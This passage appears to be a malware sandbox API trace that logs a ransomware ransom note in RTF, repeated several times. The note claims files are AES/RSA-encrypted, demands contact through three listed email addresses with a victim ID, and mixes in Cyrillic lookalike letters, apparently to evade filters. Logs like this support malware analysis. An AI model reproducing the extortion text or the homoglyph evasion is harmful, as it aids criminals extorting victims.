\\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.904] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2867358, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to 